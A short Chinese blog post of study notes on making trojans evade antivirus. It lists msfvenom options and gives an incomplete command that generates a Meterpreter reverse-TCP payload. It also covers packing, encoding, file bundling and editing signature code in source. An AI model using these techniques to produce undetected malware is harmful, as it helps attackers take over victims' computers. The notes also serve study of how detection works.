首页 > 其他分享 >免杀

免杀

时间:2023-04-12 20:23:36浏览次数:38  
标签:定位 免杀 文件 指定 源码 shellcode

免杀基础

1.初步木马免杀可能要更改进程名称,图标,文件名称,文件属性,加壳,生成木马时使用编码

修改源码的特征码;对shellcode二次编译;免杀生成器;加载器和shellcode分离,

msfvenom免杀

常用命令:

x86 or x 64

-a : 指定位数 x

-p :指定payload模块 -l:列出可用项

-f:指定文件类型 -e:加载编码器

-b:-bad-chars 删除无效字符 -i:-iterations指定编码次数

-x:捆绑文件 -o:导出文件

一般来说捆绑文件的免杀机率会大一些

msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport= 

 

源码免杀

源码免杀基于特征码的一种免杀方式,定位源码中的特征代码进行修改就可以达到免杀效果:

定位特征码分为三种 1.定位到代码 2 定位到字符串 3 定位到输出表

攻击vs2012依赖文件 visual c++ mfc for and64

https://aka.ms/vs/16/release/vc_redist.x64.exe

杀软的疑似检测方向

1. 图标 2.关键字检测 3.配置文件的版本信息等(其实也是关键字)

 

标签:定位,免杀,文件,指定,源码,shellcode
From: https://www.cnblogs.com/lisenMiller/p/17308341.html

相关文章

  • 免杀|PEiD查壳、脱壳+汉化+工具打包
    一、加壳加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是隐藏程序真正的OEP(入口点,防止被破解,查壳就是为了找它),类似于动物界的......
  • 免杀原理
    一、实验内容1.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程2.通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原理,不要截图。与......
  • Exp3-免杀原理 20202211王宏韬
    目录1.基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?(4)开启杀软能绝对防止电脑中恶意代码吗?2.实践总结与体会3.实践过程记录3.1环境准备3.1.1安装wine323.1.2安装工具veil3.2正确使用msf编码器,使用msfvenom生成如jar之类的......
  • Exp3:免杀原理
    目录一.实验信息二.实验内容2.1实验内容2.1.1方法(分)2.1.2通过组合应用各种技术实现恶意代码免杀(1分)2.1.3附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分1)2.2报告要求三.实验知识3.1免杀3.2veilevasion3.3实验检测平台四.实验过......
  • Exp3-免杀原理
    Exp3-免杀原理目录1、基础问题回答1.1杀软检测出恶意代码的原理1.1.1基于特征码1.1.2利用启发式恶意软件1.1.3基于行为1.2什么是免杀1.3免杀的基本方法1.3.1改变特征码1.3.2改变行为1.4杀软不能绝对保证电脑安全二、实验内容......
  • MSF实战免杀过静态:ShellCode加花指令
    分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中......
  • 《网络对抗技术》——Exp3 免杀原理与实践
    目录一、实践内容1.2实践内容1、免杀2、恶意软件检测机制启发式恶意软件检测3、加壳二、实践过程记录1、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil1、安装veil2、使用Veil生成后门文件3、使用C+shellcode编程4、加壳工具——压缩壳工具UPX5、加壳工具——加......
  • Exp3-免杀原理
    目录一、基础问题回答1、杀软是如何检测出恶意代码的?2、免杀是做什么的?3、免杀的基本方法有哪些?4.开启杀软能绝对防止电脑中恶意代码吗?二、实践过程记录1、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件1.1得到kali的ip地址192.168.136.1291.2检验直接生成的后门exe文......
  • Exp3-免杀原理 实验报告—20201229赵斌
    免杀原理与实践基础问题回答Q1:杀软是如何检测出恶意代码的?(1)基于特征码的检测特征码是一段或多段数据,如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特......
  • 网络对抗实验三 免杀原理与实践
    目录《网络对抗技术》——Exp3免杀原理与实践1.1实践目标1.2基础知识任务一:正确使用免杀工具或技巧1.正确使用msf编码器2.msfvenom生成如jar之类的其他文件3.使用veil-e......